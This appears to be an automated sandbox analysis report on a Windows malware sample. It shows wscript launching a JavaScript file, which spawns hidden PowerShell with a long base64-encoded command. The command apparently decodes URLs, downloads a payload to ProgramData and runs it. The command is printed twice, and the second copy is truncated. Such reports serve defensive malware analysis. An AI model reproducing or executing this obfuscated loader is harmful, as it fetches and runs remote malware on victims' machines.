Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 12, 2023, 9:27 a.m. | May 12, 2023, 9:30 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative
2144-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA="
2280
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhA